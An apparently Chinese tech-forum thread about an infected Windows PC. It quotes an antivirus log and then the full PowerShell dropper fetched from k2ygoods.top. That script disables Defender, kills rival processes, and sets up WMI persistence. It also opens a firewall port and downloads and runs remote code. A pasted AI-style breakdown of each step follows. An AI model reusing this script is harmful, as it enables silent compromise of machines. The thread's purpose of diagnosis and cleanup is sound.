windows 中毒了

哪位大佬给他 D 一下，Google 搜了下 k2ygoods ，好多
```log
防护项目：利用系统进程启动恶意程序
可疑文件：C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
执行命令行：powershell.exe  IEX (New-Object system.Net.WebClient).DownloadString('http://k2ygoods.top/power.txt')
操作结果：已阻止
进程 ID：5580
操作进程：C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
操作进程命令行：cmd /c powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://k2ygoods.top/power.txt')
操作进程校验和：7C3D7281E1151FE4127923F4B4C3CD36438E1A12
父进程 ID：1132
父进程：C:\Windows\System32\wbem\WmiPrvSE.exe
父进程命令行：C:\Windows\system32\wbem\wmiprvse.exe -Embedding
```


难受，一堆 ai

@gbadge v50 告诉你

访问了，什么时候能收到勒索信

$sys=-join ([char[]](48..57+97..122) | Get-Random -Count (Get-Random (6..12)))
$dst="C:\Windows\debug\m\winlogon.exe"
#netsh advfirewall set allprofiles state off

Set-MpPreference -DisableIOAVProtection $true
Set-MpPreference -DisableRealtimeMonitoring $true
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /d 1 /t REG_DWORD /f

# oldservice


gwmi -Class 'Win32_Process' -Filter "Name='svchost.exe'"|%{if(($_.ExecutablePath -ne ($env:windir+'\system32\svchost.exe')) -and ($_.ExecutablePath -ne ($env:windir+'\syswow64\svchost.exe'))){$_.Terminate();del -LiteralPath $_.ExecutablePath -Force;}}
gwmi -Class 'Win32_Process' -Filter "Name='conhost.exe'"|%{if(($_.ExecutablePath -ne ($env:windir+'\system32\conhost.exe')) -and ($_.ExecutablePath -ne ($env:windir+'\syswow64\conhost.exe'))){$_.Terminate();del -LiteralPath $_.ExecutablePath -Force;}}
gwmi -Class 'Win32_Process' -Filter "Name='Runtime.exe'"|%{if(($_.ExecutablePath -eq ($env:windir+'\Runtime.exe'))){$_.Terminate();del -LiteralPath $_.ExecutablePath -Force;}}
gwmi -Class 'Win32_Process' -Filter "Name='Superfetch.exe'"|%{if(($_.ExecutablePath -eq ($env:windir+'\Tasks\Superfetch.exe'))){$_.Terminate();del -LiteralPath $_.ExecutablePath -Force;}}
gwmi -Class 'Win32_Process' -Filter "Name='ApplicationsFrameHost.exe'"|%{if(($_.ExecutablePath -eq ($env:windir+'\Tasks\ApplicationsFrameHost.exe'))){$_.Terminate();del -LiteralPath $_.ExecutablePath -Force;}}
gwmi -Class 'Win32_Process' -Filter "Name='MsTask.exe'"|%{if(($_.ExecutablePath -eq ($env:windir+'\Tasks\MsTask.exe'))){$_.Terminate();del -LiteralPath $_.ExecutablePath -Force;icacls "C:\ProgramData\migrate.exe" /setowner SYSTEM;icacls "C:\ProgramData\migrate.exe" /inheritance:r /deny "SYSTEM:F";}}
gwmi -Class 'Win32_Process' -Filter "Name='MicrosoftPrt.exe'"|%{if(($_.ExecutablePath -eq ($env:windir+'\Tasks\MicrosoftPrt.exe'))){$_.Terminate();del -LiteralPath $_.ExecutablePath -Force;}}
gwmi -Class 'Win32_Process' -Filter "Name='Wmiic.exe'"|%{if(($_.ExecutablePath -eq ($env:windir+'\Tasks\Wmiic.exe'))){$_.Terminate();del -LiteralPath $_.ExecutablePath -Force;}}
gwmi -Class 'Win32_Process' -Filter "Name='IntelConfigService.exe'"|%{if(($_.ExecutablePath -eq ($env:windir+'\Tasks\IntelConfigService.exe'))){$_.Terminate();del -LiteralPath $_.ExecutablePath -Force;}}
gwmi -Class 'Win32_Process' -Filter "Name='warp.exe'"|%{if(($_.ExecutablePath -eq ($env:windir+'\Tasks\warp.exe'))){$_.Terminate();del -LiteralPath $_.ExecutablePath -Force;}}
gwmi -Class 'Win32_Process' -Filter "Name='WmiPrvSER.exe'"|%{if(($_.ExecutablePath -eq ($env:windir+'\Microsoft.NET\Framework\v3.0\WmiPrvSER.exe'))){$_.Terminate();del -LiteralPath $_.ExecutablePath -Force;}}



$pExsit = (Get-Process winlogon -ErrorAction SilentlyContinue).Path -eq $dst
$sExsit = (Get-Service "Windows Updata" -ErrorAction SilentlyContinue).Status -eq "Running"

if ($pExsit -and  $sExsit) {

    IEX (New-Object system.Net.WebClient).DownloadString('http://k2ygoods.top/config.txt')
}else{
    Get-WMIObject -Namespace root\Subscription -Class __EventFilter -Filter "Name='updata'" | Remove-WmiObject -Verbose
    Get-WMIObject -Namespace root\Subscription -Class __EventFilter -Filter "Name='updata2'" | Remove-WmiObject -Verbose
    Get-WMIObject -Namespace root\Subscription -Class CommandLineEventConsumer -Filter "Name='updata2'" | Remove-WmiObject -Verbose
    Get-WMIObject -Namespace root\Subscription -Class __FilterToConsumerBinding -Filter "__Path LIKE '%updata%'" | Remove-WmiObject -Verbose


    $filterName = 'updata'
    $consumerName = 'updata2'
    $exePath = 'cmd /c powershell.exe IEX (New-Object system.Net.WebClient).DownloadString(''http://k2ygoods.top/power.txt'')'
    $Query = "SELECT * FROM __InstanceModificationEvent WITHIN 10900 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'"
    $WMIEventFilter = Set-WmiInstance -Class __EventFilter -NameSpace "root\subscription" -Arguments @{Name=$filterName;EventNameSpace="root\cimfshex";QueryLanguage="WQL";Query=$Query} -ErrorAction Stop
    $WMIEventConsumer = Set-WmiInstance -Class CommandLineEventConsumer -Namespace "root\subscription" -Arguments @{Name=$consumerName;CommandLineTemplate=$exePath}
    Set-WmiInstance -Class __FilterToConsumerBinding -Namespace "root\subscription" -Arguments @{Filter=$WMIEventFilter;Consumer=$WMIEventConsumer}


   
    sc.exe stop "Windows Updata"
    sc.exe delete "Windows Updata"
    sc.exe stop "Windows Management"
    sc.exe delete "Windows Management"

    netsh advfirewall firewall add rule name="Windows Remote Management (HTTP-In)" dir=in action=allow service=any enable=yes profile=any localport=59857 protocol=tcp

    #Start-Process  -windowstyle hidden
    IEX (New-Object system.Net.WebClient).DownloadString('http://k2ygoods.top/download.txt')
}

你给 k2ygoods.top 这个域名在 HOSTS 里面强制指向 127.0.0.1 病毒自然就失效了！

Windows 的宿主机千万不能装需要管理员权限的软件，一定要用提权的软件，你就买性能好的机器再开 Sandbox ！

#8 #11 别发 ai 分析了，一两句话总结的小脚本，刷屏一样

@dyllen 网马，以前 IE 时代多的是，可以同时好多种漏洞访问就中毒。

浏览器的 0day ，你用的 IE ？

http://k2ygoods[.]top/power.txt





这个 PowerShell 脚本有很强的恶意行为，涉及禁用 Windows 安全特性、删除系统进程、并尝试从远程服务器下载和执行恶意代码。下面是对脚本的详细分析：

### 1. 生成随机字符串
```powershell
$sys=-join ([char[]](48..57+97..122) | Get-Random -Count (Get-Random (6..12)))
```
- 该行代码生成一个长度在 6 到 12 之间的随机字符串，由小写字母和数字组成。

### 2. 定义目标路径
```powershell
$dst="C:\Windows\debug\m\winlogon.exe"
```
- 该变量定义了一个路径，指向`winlogon.exe`的假定位置。

### 3. 禁用防火墙
```powershell
#netsh advfirewall set allprofiles state off
```
- 注释掉的行试图关闭所有 Windows 防火墙。虽然被注释掉，但这显示了脚本的潜在意图。

### 4. 禁用 Windows Defender
```powershell
Set-MpPreference -DisableIOAVProtection $true
Set-MpPreference -DisableRealtimeMonitoring $true
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /d 1 /t REG_DWORD /f
```
- 这些命令禁用了 Windows Defender 的实时监控和反间谍软件功能，使得系统更加容易受到恶意软件的攻击。

### 5. 终止和删除某些进程
```powershell
gwmi -Class 'Win32_Process' -Filter "Name='svchost.exe'" | %{if(($_.ExecutablePath -ne ($env:windir+'\system32\svchost.exe')) -and ($_.ExecutablePath -ne ($env:windir+'\syswow64\svchost.exe'))){$_.Terminate();del -LiteralPath $_.ExecutablePath -Force;}}
```
- 使用`Get-WmiObject` (gwmi) 获取正在运行的进程，并筛选出特定名称的进程（如`svchost.exe`）。如果这些进程不在预期的系统路径中（如`system32`或`syswow64`），则终止并强制删除其可执行文件。
- 这一段代码显然在试图清除潜在的恶意进程，但也可能用于杀死合法进程，从而破坏系统的正常功能。

### 6. 检查特定进程和服务是否存在
```powershell
$pExsit = (Get-Process winlogon -ErrorAction SilentlyContinue).Path -eq $dst
$sExsit = (Get-Service "Windows Updata" -ErrorAction SilentlyContinue).Status -eq "Running"
```
- 这两行代码检查`winlogon`进程是否在指定的路径上运行，以及名为`Windows Updata`的服务是否正在运行。

### 7. 从远程服务器下载并执行代码
```powershell
if ($pExsit -and  $sExsit) {
    IEX (New-Object system.Net.WebClient).DownloadString('http://k2ygoods.top/config.txt')
} else {
    ...
    IEX (New-Object system.Net.WebClient).DownloadString('http://k2ygoods.top/download.txt')
}
```
- 如果检查通过，脚本将从`http://k2ygoods.top/config.txt`下载并执行内容；否则，它会清理某些 WMI 事件和消费者，然后从`http://k2ygoods.top/download.txt`下载并执行代码。

### 8. 清除和创建 WMI 事件过滤器与消费者
```powershell
Get-WMIObject -Namespace root\Subscription -Class __EventFilter -Filter "Name='updata'" | Remove-WmiObject -Verbose
...
$WMIEventFilter = Set-WmiInstance -Class __EventFilter -NameSpace "root\subscription" ...
$WMIEventConsumer = Set-WmiInstance -Class CommandLineEventConsumer -Namespace "root\subscription" ...
```
- 这一部分脚本清除了某些 WMI 事件过滤器和消费者，然后创建了新的过滤器和消费者。新的 WMI 事件设置会在特定条件下（如性能计数器事件）触发执行远程下载的恶意代码。

### 9. 停止和删除服务
```powershell
sc.exe stop "Windows Updata"
sc.exe delete "Windows Updata"
sc.exe stop "Windows Management"
sc.exe delete "Windows Management"
```
- 这些命令试图停止并删除名为`Windows Updata`和`Windows Management`的服务。此类操作可能会影响系统的管理功能。

### 10. 开启防火墙规则
```powershell
netsh advfirewall firewall add rule name="Windows Remote Management (HTTP-In)" dir=in action=allow service=any enable=yes profile=any localport=59857 protocol=tcp
```
- 脚本通过添加防火墙规则，允许 TCP 59857 端口的远程访问，这可能会为攻击者提供一个后门。

### 总结
这个脚本是一个恶意脚本，意图禁用系统的安全功能，清理并终止一些系统进程，设置持久化机制，并从远程服务器下载和执行恶意代码。它对系统的安全性构成了严重威胁，运行该脚本可能导致系统被完全控制或被用于进一步的恶意活动。

访问不了